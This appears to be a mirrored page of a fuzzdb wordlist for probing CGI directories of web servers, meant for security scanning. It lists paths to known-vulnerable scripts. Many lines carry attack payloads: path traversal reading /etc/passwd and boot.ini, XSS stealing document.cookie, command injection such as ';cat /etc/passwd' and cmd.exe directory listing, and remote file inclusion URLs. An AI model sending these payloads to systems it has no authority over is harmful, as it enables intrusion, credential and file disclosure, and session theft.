mirror of
https://github.com/fuzzdb-project/fuzzdb.git
synced 2024-11-10 13:34:12 +00:00
3949 lines
137 KiB
Text
3949 lines
137 KiB
Text
|
# fuzz inside cgi directories - on windows, this is usually /scripts /bin /cgi or /cgi-bin, on unix, usually /cgi-bin /cgi or /nph-cgi
|
||
|
|
14all-1.1.cgi?cfg=../../../../../../../../etc/passwd
|
||
|
|
14all.cgi?cfg=../../../../../../../../etc/passwd
|
||
|
|
666%0a%0a<script>alert('Vulnerable');</script>666.jsp
|
||
|
|
852566C90012664F
|
||
|
|
</etc/passwd>
|
||
|
|
<script>alert('Vulnerable')</script>
|
||
|
|
<script>alert('Vulnerable')</script>.aspx
|
||
|
|
<script>alert('Vulnerable')</script>.jsp
|
||
|
|
<script>alert('Vulnerable')</script>.shtm
|
||
|
|
<script>alert('Vulnerable')</script>.shtml
|
||
|
|
<script>alert('Vulnerable')</script>.stm
|
||
|
|
<script>alert('Vulnerable')</script>.thtml
|
||
|
|
?D=A
|
||
|
|
?M=A
|
||
|
|
?N=D
|
||
|
|
?Open
|
||
|
|
?OpenServer
|
||
|
|
?PageServices
|
||
|
|
?S=A
|
||
|
|
?\"><script>alert('Vulnerable');</script>
|
||
|
|
?mod=<script>alert(document.cookie)</script>&op=browse
|
||
|
|
?mod=node&nid=some_thing&op=view
|
||
|
|
?mod=some_thing&op=browse
|
||
|
|
?pattern=/etc/*&sort=name
|
||
|
|
?sql_debug=1
|
||
|
|
?wp-cs-dump
|
||
|
|
ADMINconfig.php
|
||
|
|
ASP/cart/database/metacart.mdb
|
||
|
|
AT-admin.cgi
|
||
|
|
AT-generate.cgi
|
||
|
|
Admin/
|
||
|
|
Admin_files/
|
||
|
|
Admin_files/order.log
|
||
|
|
Administration/
|
||
|
|
Agent/
|
||
|
|
Agentes/
|
||
|
|
Agents/
|
||
|
|
Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0
|
||
|
|
AnyBoard.cgi
|
||
|
|
AnyForm
|
||
|
|
AnyForm2
|
||
|
|
Asp/
|
||
|
|
BACLIENT
|
||
|
|
Backup/add-passwd.cgi
|
||
|
|
C
|
||
|
|
CFIDE/administrator/index.cfm
|
||
|
|
CFIDE/probe.cfm
|
||
|
|
COM
|
||
|
|
CSMailto.cgi
|
||
|
|
CSMailto/CSMailto.cgi
|
||
|
|
CSNews.cgi
|
||
|
|
CVS/Entries
|
||
|
|
Cgitest.exe
|
||
|
|
Citrix/ICAWEB/
|
||
|
|
Citrix/MetaFrameXP/default/login.asp
|
||
|
|
Citrix/PNAgent/
|
||
|
|
Config1.htm
|
||
|
|
Count.cgi
|
||
|
|
DB4Web/10.10.10.10:100
|
||
|
|
DC
|
||
|
|
DCFORM
|
||
|
|
DCFORMS98.CGI
|
||
|
|
DCShop/auth_data/auth_user_file.txt
|
||
|
|
DCShop/orders/orders.txt
|
||
|
|
DEASAppDesign.nsf
|
||
|
|
DEASLog.nsf
|
||
|
|
DEASLog01.nsf
|
||
|
|
DEASLog02.nsf
|
||
|
|
DEASLog03.nsf
|
||
|
|
DEASLog04.nsf
|
||
|
|
DEASLog05.nsf
|
||
|
|
DEESAdmin.nsf
|
||
|
|
DMR/
|
||
|
|
Data/settings.xml+
|
||
|
|
DomainFiles/*//../../../../../../../../../../etc/passwd
|
||
|
|
EXE/
|
||
|
|
Excel/
|
||
|
|
File
|
||
|
|
FileSeek.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd
|
||
|
|
FileSeek.cgi?head=&foot=;cat%20/etc/passwd
|
||
|
|
FileSeek.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=
|
||
|
|
FileSeek.cgi?head=;cat%20/etc/passwd|&foot=
|
||
|
|
FileSeek2.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd
|
||
|
|
FileSeek2.cgi?head=&foot=;cat%20/etc/passwd
|
||
|
|
FileSeek2.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=
|
||
|
|
FileSeek2.cgi?head=;cat%20/etc/passwd|&foot=
|
||
|
|
FormHandler.cgi?realname=aaa&email=aaa&reply_message_template=%2Fetc%2Fpasswd&reply_message_from=sq%40example.com&redirect=http%3A%2F%2Fwww.example.com&recipient=sq%40example.com
|
||
|
|
FormMail.cgi?<script>alert(\
|
||
|
|
FormMail.pl
|
||
|
|
GW5/GWWEB.EXE
|
||
|
|
GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA
|
||
|
|
GW5/GWWEB.EXE?HELP=bad-request
|
||
|
|
GWWEB.EXE?HELP=bad-request
|
||
|
|
Gozila.cgi
|
||
|
|
HyperStat/stat_what.log
|
||
|
|
IBMWebAS/
|
||
|
|
IBMWebAS/apidocs/
|
||
|
|
IBMWebAS/configDocs/
|
||
|
|
IBMWebAS/docs/
|
||
|
|
IBMWebAS/mbeanDocs/
|
||
|
|
IDSWebApp/IDSjsp/Login.jsp
|
||
|
|
ISSamples/SQLQHit.asp
|
||
|
|
ISSamples/sqlqhit.asp
|
||
|
|
IlohaMail/blank.html
|
||
|
|
ImageFolio/admin/admin.cgi
|
||
|
|
JUNK(10)
|
||
|
|
JUNK(10)abcd.html
|
||
|
|
JUNK(223)<font%20size=50><script>alert('Vulnerable')</script><!--//--
|
||
|
|
JUNK(223)<font%20size=50>DEFACED<!--//--
|
||
|
|
JUNK(5).csp
|
||
|
|
JUNK(5).htw
|
||
|
|
JUNK(5).xml
|
||
|
|
JUNK(5)/
|
||
|
|
JUNK(6).cfm?mode=debug
|
||
|
|
LOGIN.PWD
|
||
|
|
LWGate
|
||
|
|
LWGate.cgi
|
||
|
|
LiveHelp/
|
||
|
|
MIDICART/midicart.mdb
|
||
|
|
MSword/
|
||
|
|
MWS/HandleSearch.html?searchTarget=test&B1=Submit
|
||
|
|
Mem/dynaform/FileExplorer.htm
|
||
|
|
Mem/dynaform/Login.htm?WINDWEB_URL=%2FMem%2Fdynaform%2FLogin.htm&ListIndexUser=0&sWebParam1=admin000
|
||
|
|
MsmMask.exe
|
||
|
|
MsmMask.exe?mask=/junk334
|
||
|
|
Msword/
|
||
|
|
NUKEbb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
|
||
|
|
NUKEbbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
|
||
|
|
NUKEindex.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
|
||
|
|
NUKEindex.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
|
||
|
|
NUKEindex.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
|
||
|
|
NUKEindex.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
|
||
|
|
NUKEviewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
|
||
|
|
NUKEviewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
|
||
|
|
NUL/../../../../../../../../../WINNT/system32/ipconfig.exe
|
||
|
|
NULL.printer
|
||
|
|
NetDetector/middle_help_intro.htm
|
||
|
|
NetDynamic/
|
||
|
|
NetDynamics/
|
||
|
|
OA_HTML/
|
||
|
|
OA_HTML/META-INF/
|
||
|
|
OA_HTML/PTB/ECXOTAPing.htm
|
||
|
|
OA_HTML/PTB/ICXINDEXBASECASE.htm
|
||
|
|
OA_HTML/PTB/mwa_readme.htm
|
||
|
|
OA_HTML/PTB/xml_sample1.htm
|
||
|
|
OA_HTML/_pages/
|
||
|
|
OA_HTML/jsp/
|
||
|
|
OA_HTML/jsp/fnd/fndhelp.jsp?dbc=/u01/oracle/prodappl/fnd/11.5.0/secure/dbprod2_prod.dbc
|
||
|
|
OA_HTML/jsp/fnd/fndhelputil.jsp
|
||
|
|
OA_HTML/jsp/fnd/fndversion.jsp
|
||
|
|
OA_HTML/jsp/por/services/login.jsp
|
||
|
|
OA_HTML/jsp/wf/WFReassign.jsp
|
||
|
|
OA_HTML/oam/
|
||
|
|
OA_HTML/oam/weboam.log
|
||
|
|
OA_HTML/webtools/doc/index.html
|
||
|
|
OA_JAVA/
|
||
|
|
OA_JAVA/Oracle/
|
||
|
|
OA_JAVA/oracle/forms/registry/Registry.dat
|
||
|
|
OA_JAVA/servlet.zip
|
||
|
|
OA_MEDIA/
|
||
|
|
OpenFile.aspx?file=../../../../../../../../../../boot.ini
|
||
|
|
OpenTopic
|
||
|
|
Orders/order_log.dat
|
||
|
|
Orders/order_log_v12.dat
|
||
|
|
PDG_Cart/
|
||
|
|
PDG_Cart/oder.log
|
||
|
|
PDG_Cart/shopper.conf
|
||
|
|
PHPMYADMINdb_details_importdocsql.php?submit_show=true&do=import&docpath=../../../../../../../etc
|
||
|
|
PHPMYADMINexport.php?what=../../../../../../../../../../../../etc/passwd%00
|
||
|
|
POSTNUKEMy_eGallery/public/displayCategory.php
|
||
|
|
PRN/../../../../../../../../../WINNT/system32/ipconfig.exe
|
||
|
|
PSUser/PSCOErrPage.htm?errPagePath=/etc/passwd
|
||
|
|
Page/1,10966,,00.html?var=<script>alert('Vulnerable')</script>
|
||
|
|
Pages/
|
||
|
|
Pbcgi.exe
|
||
|
|
ProductCart/pc/msg.asp?|-|0|404_Object_Not_Found
|
||
|
|
Program%20Files/
|
||
|
|
README
|
||
|
|
README.TXT
|
||
|
|
ROADS/cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00
|
||
|
|
SGB_DIR/superguestconfig
|
||
|
|
SPHERA/login/sm_login_screen.php?error=\"><script>alert('Vulnerable')</script>
|
||
|
|
SPHERA/login/sm_login_screen.php?uid=\"><script>alert('Vulnerable')</script>
|
||
|
|
SQLQHit.asp
|
||
|
|
SQLServ/sqlbrowse.asp?filepath=c:\&Opt=3
|
||
|
|
SUNWmc/htdocs/
|
||
|
|
SUNWmc/htdocs/en_US/
|
||
|
|
Search
|
||
|
|
SetSecurity.shm
|
||
|
|
SilverStream
|
||
|
|
SilverStream/Meta/Tables/?access-mode=text
|
||
|
|
Site/biztalkhttpreceive.dll
|
||
|
|
SiteScope/cgi/go.exe/SiteScope?page=eventLog&machine=&logName=System&account=administrator
|
||
|
|
SiteScope/htdocs/SiteScope.html
|
||
|
|
SiteServer/Admin/commerce/foundation/DSN.asp
|
||
|
|
SiteServer/Admin/commerce/foundation/domain.asp
|
||
|
|
SiteServer/Admin/commerce/foundation/driver.asp
|
||
|
|
SiteServer/Admin/knowledge/dsmgr/default.asp
|
||
|
|
SiteServer/Admin/knowledge/dsmgr/users/GroupManager.asp
|
||
|
|
SiteServer/Admin/knowledge/dsmgr/users/UserManager.asp
|
||
|
|
SiteServer/Admin/knowledge/persmbr/VsLsLpRd.asp
|
||
|
|
SiteServer/Admin/knowledge/persmbr/VsPrAuoEd.asp
|
||
|
|
SiteServer/Admin/knowledge/persmbr/VsTmPr.asp
|
||
|
|
SiteServer/Admin/knowledge/persmbr/vs.asp
|
||
|
|
SiteServer/Knowledge/Default.asp?ctr=\"><script>alert('Vulnerable')</script>
|
||
|
|
SiteServer/Publishing/ViewCode.asp
|
||
|
|
SiteServer/admin/
|
||
|
|
SiteServer/admin/findvserver.asp
|
||
|
|
Sites/Knowledge/Membership/Inspired/ViewCode.asp
|
||
|
|
Sites/Knowledge/Membership/Inspiredtutorial/ViewCode.asp
|
||
|
|
Sites/Samples/Knowledge/Membership/Inspired/ViewCode.asp
|
||
|
|
Sites/Samples/Knowledge/Membership/Inspiredtutorial/ViewCode.asp
|
||
|
|
Sites/Samples/Knowledge/Push/ViewCode.asp
|
||
|
|
Sites/Samples/Knowledge/Search/ViewCode.asp
|
||
|
|
Sources/
|
||
|
|
Statistics/
|
||
|
|
Stats/
|
||
|
|
StoreDB/
|
||
|
|
Survey/Survey.Htm
|
||
|
|
TopSitesdirectory/help.php?sid=<script>alert(document.cookie)</script>
|
||
|
|
USER/CONFIG.AP
|
||
|
|
Upload.pl
|
||
|
|
VBZooM/add-subject.php
|
||
|
|
Vs
|
||
|
|
VsSetCookie.exe?
|
||
|
|
W
|
||
|
|
WEB-INF./web.xml
|
||
|
|
WEB-INF/web.xml
|
||
|
|
WEBAGENT/CQMGSERV/CF-SINFO.TPF
|
||
|
|
WINDMAIL.EXE?%20-n%20c:\boot.ini%
|
||
|
|
WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\
|
||
|
|
WS_FTP.LOG
|
||
|
|
WS_FTP.ini
|
||
|
|
WebAdmin.dll?View=Logon
|
||
|
|
WebCacheDemo.html
|
||
|
|
WebShop/
|
||
|
|
WebShop/logs/cc.txt
|
||
|
|
WebShop/templates/cc.txt
|
||
|
|
WebSphereSamples
|
||
|
|
WebTrend/
|
||
|
|
Web_Store/web_store.cgi?page=../../../../../../../../../../etc/passwd%00.html
|
||
|
|
Web_store/
|
||
|
|
Webnews.exe
|
||
|
|
XMBforum/buddy.php
|
||
|
|
XMBforum/member.php
|
||
|
|
XSQLConfig.xml
|
||
|
|
Xcelerate/LoginPage.html
|
||
|
|
YaBB.pl?board=news&action=display&num=../../../../../../../../../../etc
|
||
|
|
YaBB.pl?board=news&action=display&num=../../../../../../../../../../etc/passwd%00
|
||
|
|
YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>
|
||
|
|
YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('XSS')</script>
|
||
|
|
[SecCheck]/..%252f..%252f../ext.ini
|
||
|
|
[SecCheck]/..%255c..%255c../ext.ini
|
||
|
|
[SecCheck]/..%2f../ext.ini
|
||
|
|
\"><img%20src=\"javascript:alert(document.domain)\">
|
||
|
|
_cti_pvt/
|
||
|
|
_head.php
|
||
|
|
_layouts/alllibs.htm
|
||
|
|
_layouts/settings.htm
|
||
|
|
_layouts/userinfo.htm
|
||
|
|
_mem_bin/
|
||
|
|
_mem_bin/FormsLogin.asp
|
||
|
|
_mem_bin/auoconfig.asp
|
||
|
|
_mem_bin/formslogin.asp?\"><script>alert('Vulnerable')</script>
|
||
|
|
_mem_bin/remind.asp
|
||
|
|
_pages
|
||
|
|
_pages/_demo/
|
||
|
|
_pages/_demo/_sql/
|
||
|
|
_pages/_webapp/_admin/_showjavartdetails.java
|
||
|
|
_pages/_webapp/_admin/_showpooldetails.java
|
||
|
|
_pages/_webapp/_jsp/
|
||
|
|
_private/
|
||
|
|
_private/_vti_cnf/
|
||
|
|
_private/form_results.htm
|
||
|
|
_private/form_results.html
|
||
|
|
_private/form_results.txt
|
||
|
|
_private/orders.htm
|
||
|
|
_private/orders.txt
|
||
|
|
_private/register.htm
|
||
|
|
_private/register.txt
|
||
|
|
_private/registrations.htm
|
||
|
|
_private/registrations.txt
|
||
|
|
_vti_bin/
|
||
|
|
_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
|
||
|
|
_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
|
||
|
|
_vti_bin/CGImail.exe
|
||
|
|
_vti_bin/_vti_aut/author.dll?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listInclude
|
||
|
|
_vti_bin/_vti_aut/author.exe?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listInclude
|
||
|
|
_vti_bin/_vti_aut/dvwssr.dll
|
||
|
|
_vti_bin/_vti_aut/fp30reg.dll
|
||
|
|
_vti_bin/_vti_aut/fp30reg.dll?xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
|
||
|
|
_vti_bin/_vti_cnf/
|
||
|
|
_vti_bin/admin.pl
|
||
|
|
_vti_bin/cfgwiz.exe
|
||
|
|
_vti_bin/contents.htm
|
||
|
|
_vti_bin/fpadmin.htm
|
||
|
|
_vti_bin/fpcount.exe
|
||
|
|
_vti_bin/fpcount.exe/
|
||
|
|
_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15
|
||
|
|
_vti_bin/fpremadm.exe
|
||
|
|
_vti_bin/fpsrvadm.exe
|
||
|
|
_vti_bin/shtml.dll/_vti_rpc
|
||
|
|
_vti_bin/shtml.dll/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611
|
||
|
|
_vti_bin/shtml.exe/_vti_rpc
|
||
|
|
_vti_bin/shtml.exe/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611
|
||
|
|
_vti_bin/shtml.exe/junk_nonexistant.exe
|
||
|
|
_vti_cnf/_vti_cnf/
|
||
|
|
_vti_inf.html
|
||
|
|
_vti_log/_vti_cnf/
|
||
|
|
_vti_pvt/access.cnf
|
||
|
|
_vti_pvt/administrators.pwd
|
||
|
|
_vti_pvt/authors.pwd
|
||
|
|
_vti_pvt/botinfs.cnf
|
||
|
|
_vti_pvt/bots.cnf
|
||
|
|
_vti_pvt/deptodoc.btr
|
||
|
|
_vti_pvt/doctodep.btr
|
||
|
|
_vti_pvt/linkinfo.cnf
|
||
|
|
_vti_pvt/service.cnf
|
||
|
|
_vti_pvt/service.pwd
|
||
|
|
_vti_pvt/services.cnf
|
||
|
|
_vti_pvt/services.org
|
||
|
|
_vti_pvt/svacl.cnf
|
||
|
|
_vti_pvt/users.pwd
|
||
|
|
_vti_pvt/writeto.cnf
|
||
|
|
_vti_txt/
|
||
|
|
_vti_txt/_vti_cnf/
|
||
|
|
a%5c.aspx
|
||
|
|
a.jsp/<script>alert('Vulnerable')</script>
|
||
|
|
a/
|
||
|
|
a1disp3.cgi?../../../../../../../../../../etc
|
||
|
|
a1disp3.cgi?../../../../../../../../../../etc/passwd
|
||
|
|
a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd
|
||
|
|
a1stats/a1disp3.cgi?../../../../../../../../../../passwd
|
||
|
|
a1stats/a1disp3.cgi?../../../../../../../etc/passwd
|
||
|
|
a1stats/a1disp4.cgi?../../../../../../../etc/passwd
|
||
|
|
a?<script>alert('Vulnerable')</script>
|
||
|
|
a_domlog.nsf
|
||
|
|
a_security.htm
|
||
|
|
ab2/Help_C/\@Ab2HelpSearch?scope=HELP&DwebQuery=<script>alert(Vulnerable)</script>
|
||
|
|
ab2/\@AdminAddadmin?uid=foo&password=bar&re_password=bar
|
||
|
|
ab2/\@AdminViewError
|
||
|
|
abonnement.asp
|
||
|
|
acart2_0/acart2_0.mdb
|
||
|
|
acart2_0/admin/category.asp
|
||
|
|
acart2_0/admin/error.asp?msg=<script>alert(\"test\")</script>
|
||
|
|
acart2_0/admin/index.asp?msg=<script>alert(\"test\")</script>
|
||
|
|
acart2_0/deliver.asp?msg=<script>alert(\"test\")</script>
|
||
|
|
acart2_0/error.asp?msg=<script>alert(\"test\")</script>
|
||
|
|
acart2_0/signin.asp?msg=<script>alert(\"test\")</script>
|
||
|
|
acartpath/signin.asp?|-|0|404_Object_Not_Found
|
||
|
|
acceso/
|
||
|
|
access-log
|
||
|
|
access.log
|
||
|
|
access/
|
||
|
|
access_log
|
||
|
|
acciones/
|
||
|
|
account.nsf
|
||
|
|
account/
|
||
|
|
accounting/
|
||
|
|
accounts.nsf
|
||
|
|
accounts/getuserdesc.asp
|
||
|
|
achievo//atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://xxxxxxxxxx/
|
||
|
|
active.log
|
||
|
|
activex/
|
||
|
|
add.php
|
||
|
|
add.php3?url=ja&adurl=javascript:<script>alert('Vulnerable')</script>
|
||
|
|
add_acl
|
||
|
|
add_ftp.cgi
|
||
|
|
add_user.php
|
||
|
|
addbanner.cgi
|
||
|
|
addressbook.php?\"><script>alert(Vulnerable)</script><!--
|
||
|
|
addressbook/index.php?name=<script>alert('Vulnerable')</script>
|
||
|
|
addressbook/index.php?surname=<script>alert('Vulnerable')</script>
|
||
|
|
adduser.cgi
|
||
|
|
addyoursite.php?catid=<Script>JavaScript:alert('Vulnerable');</Script>
|
||
|
|
adm/
|
||
|
|
admbrowse.php?down=1&cur=%2Fetc%2F&dest=passwd&rid=1&S=[someid]
|
||
|
|
admcgi/contents.htm
|
||
|
|
admcgi/scripts/Fpadmcgi.exe
|
||
|
|
admentor/adminadmin.asp
|
||
|
|
admin-serv/config/admpw
|
||
|
|
admin-serv/tasks/configuration/ViewLog?file=passwd&num=5000&str=&directories=admin-serv%2Flogs%2f..%2f..%2f..%2f..%2f..%2f..%2fetc&id=admin-serv
|
||
|
|
admin.cgi
|
||
|
|
admin.cgi?list=../../../../../../../../../../etc
|
||
|
|
admin.cgi?list=../../../../../../../../../../etc/passwd
|
||
|
|
admin.htm
|
||
|
|
admin.html
|
||
|
|
admin.nsf
|
||
|
|
admin.php
|
||
|
|
admin.php3
|
||
|
|
admin.php4?reg_login=1
|
||
|
|
admin.php?en_log_id=0&action=config
|
||
|
|
admin.php?en_log_id=0&action=users
|
||
|
|
admin.pl
|
||
|
|
admin.shtml
|
||
|
|
admin/
|
||
|
|
admin/admin.php?adminpy=1
|
||
|
|
admin/admin.shtml
|
||
|
|
admin/admin_phpinfo.php4
|
||
|
|
admin/adminproc.asp
|
||
|
|
admin/aindex.htm
|
||
|
|
admin/auth.php
|
||
|
|
admin/browse.asp?FilePath=c:\&Opt=2&level=0
|
||
|
|
admin/cfg/configscreen.inc.php+
|
||
|
|
admin/cfg/configsite.inc.php+
|
||
|
|
admin/cfg/configsql.inc.php+
|
||
|
|
admin/cfg/configtache.inc.php+
|
||
|
|
admin/cms/htmltags.php
|
||
|
|
admin/contextAdmin/contextAdmin.html
|
||
|
|
admin/cplogfile.log
|
||
|
|
admin/credit_card_info.php
|
||
|
|
admin/database/wwForum.mdb
|
||
|
|
admin/datasource.asp
|
||
|
|
admin/db.php
|
||
|
|
admin/db.php?dump_sql=1
|
||
|
|
admin/exec.php3
|
||
|
|
admin/exec.php3?cmd=cat%20/etc/passwd
|
||
|
|
admin/exec.php3?cmd=dir%20c:\
|
||
|
|
admin/index.php
|
||
|
|
admin/login.php?action=insert&username=test&password=test
|
||
|
|
admin/login.php?path=\"></form><form
|
||
|
|
admin/modules/cache.php+
|
||
|
|
admin/objects.inc.php4
|
||
|
|
admin/phpinfo.php
|
||
|
|
admin/script.php
|
||
|
|
admin/settings.inc.php+
|
||
|
|
admin/sh_taskframes.asp?Title=Configuraci%C3%B3n%20de%20registro%20Web&URL=MasterSettings/Web_LogSettings.asp?tab1=TabsWebServer%26tab2=TabsWebLogSettings%26__SAPageKey=5742D5874845934A134CD05F39C63240&Retur
|
||
|
|
admin/system.php3?cmd=cat%20/etc/passwd
|
||
|
|
admin/system.php3?cmd=dir%20c:\
|
||
|
|
admin/system_footer.php
|
||
|
|
admin/templates/header.php
|
||
|
|
admin/upload.php
|
||
|
|
admin/wg_user-info.ml
|
||
|
|
admin4.nsf
|
||
|
|
admin5.nsf
|
||
|
|
admin_t/include/aff_liste_langue.php
|
||
|
|
adminhot.cgi
|
||
|
|
administration/
|
||
|
|
administrator/
|
||
|
|
administrator/gallery/gallery.php?directory=\"<script>alert(document.cookie)</script>
|
||
|
|
administrator/gallery/navigation.php?directory=\"<script>alert(document.cookie)</script>
|
||
|
|
administrator/gallery/uploadimage.php
|
||
|
|
administrator/gallery/uploadimage.php?directory=\"<script>alert(document.cookie)</script>
|
||
|
|
administrator/gallery/view.php?path=\"<script>alert(document.cookie)</script>
|
||
|
|
administrator/popups/sectionswindow.php?type=web&link=\"<script>alert(document.cookie)</script>
|
||
|
|
administrator/upload.php?newbanner=1&choice=\"<script>alert(document.cookie)</script>
|
||
|
|
adminwww.cgi
|
||
|
|
admisapi/fpadmin.htm
|
||
|
|
adovbs.inc
|
||
|
|
adsamples/config/site.csc
|
||
|
|
adv/gm001-mc/
|
||
|
|
advwebadmin/
|
||
|
|
advworks/equipment/catalog_type.asp
|
||
|
|
af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
|
||
|
|
aff_news.php
|
||
|
|
affich.php?image=<script>alert(document.cookie)</script>
|
||
|
|
agentadmin.php
|
||
|
|
agentes/
|
||
|
|
agentrunner.nsf
|
||
|
|
aglimpse
|
||
|
|
aglimpse.cgi
|
||
|
|
akopia/
|
||
|
|
aktivate/cgi-bin/catgy.cgi?key=0&cartname=axa200135022551089&desc=<script>alert('Vulnerable')</script>
|
||
|
|
albums/userpics/Copperminer.jpg.php?cat%20/etc/passwd
|
||
|
|
alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,
|
||
|
|
alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
|
||
|
|
alog.nsf
|
||
|
|
amadmin.pl
|
||
|
|
ammerum/
|
||
|
|
anacondaclip.pl?template=../../../../../../../../../../etc
|
||
|
|
anacondaclip.pl?template=../../../../../../../../../../etc/passwd
|
||
|
|
analog/
|
||
|
|
ans.pl?p=../../../../../usr/bin/id|&blah
|
||
|
|
ans/ans.pl?p=../../../../../usr/bin/id|&blah
|
||
|
|
anthill/login.php
|
||
|
|
antispam/listdel?file=blacklist&name=b<script>alert('Vulnerable')</script>&startline=0
|
||
|
|
antispam/listdel?file=whitelist&name=a<script>alert('Vulnerable')</script>&startline=0(naturally)
|
||
|
|
anyboard.cgi
|
||
|
|
apache/
|
||
|
|
apex/
|
||
|
|
apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/
|
||
|
|
aplogon.html
|
||
|
|
app/
|
||
|
|
appdet.html
|
||
|
|
applicattion/
|
||
|
|
applicattions/
|
||
|
|
applist.asp
|
||
|
|
approval/ts_app.htm
|
||
|
|
apps/
|
||
|
|
apps/web/index.fcgi?servers=§ion=<script>alert(document.cookie)</script>
|
||
|
|
apps/web/vs_diag.cgi?server=<script>alert('Vulnerable')</script>
|
||
|
|
archie
|
||
|
|
architext_query.cgi
|
||
|
|
architext_query.pl
|
||
|
|
archivar/
|
||
|
|
archive.asp
|
||
|
|
archive/
|
||
|
|
archive/a_domlog.nsf
|
||
|
|
archive/l_domlog.nsf
|
||
|
|
archive_forum.asp
|
||
|
|
archives/
|
||
|
|
archivo/
|
||
|
|
ariadne/
|
||
|
|
article.cfm?id=1'<script>alert(document.cookie);</script>
|
||
|
|
article.php?article=4965&post=1111111111
|
||
|
|
article.php?sid=\"><Img
|
||
|
|
ash
|
||
|
|
ashnews.php
|
||
|
|
asp/
|
||
|
|
asp/SQLQHit.asp
|
||
|
|
asp/sqlqhit.asp
|
||
|
|
astrocam.cgi
|
||
|
|
atc/
|
||
|
|
athcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[['
|
||
|
|
athenareg.php?pass=%20;cat%20/etc/passwd
|
||
|
|
atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL
|
||
|
|
atomicboard/index.php?location=../../../../../../../../../../etc/passwd
|
||
|
|
auction/auction.cgi?action=
|
||
|
|
auction/auction.cgi?action=Sort_Page&View=Search&Page=0&Cat_ID=&Lang=English&Search=All&Terms=<script>alert('Vulnerable');</script>&Where=&Sort=Photo&Dir=
|
||
|
|
auctiondeluxe/auction.pl
|
||
|
|
auktion.cgi?menue=../../../../../../../../../../etc
|
||
|
|
auktion.cgi?menue=../../../../../../../../../../etc/passwd
|
||
|
|
auth.inc.php
|
||
|
|
auth/
|
||
|
|
auth_data/auth_user_file.txt
|
||
|
|
author.asp
|
||
|
|
autohtml.php?op=modload&mainfile=x&name=/etc/passwd
|
||
|
|
autologon.html?10514
|
||
|
|
awebvisit.stat
|
||
|
|
awl/auctionweaver.pl
|
||
|
|
awstats.pl
|
||
|
|
awstats/awstats.pl
|
||
|
|
ax-admin.cgi
|
||
|
|
ax.cgi
|
||
|
|
axis-cgi/buffer/command.cgi
|
||
|
|
axs.cgi
|
||
|
|
ayuda/
|
||
|
|
b2-include/b2edit.showposts.php
|
||
|
|
b2-tools/gm-2-b2.php
|
||
|
|
ba4.nsf
|
||
|
|
backdoor/
|
||
|
|
backup/
|
||
|
|
badmin.cgi
|
||
|
|
bak/
|
||
|
|
ban.bak
|
||
|
|
ban.dat
|
||
|
|
ban.log
|
||
|
|
banca/
|
||
|
|
banco/
|
||
|
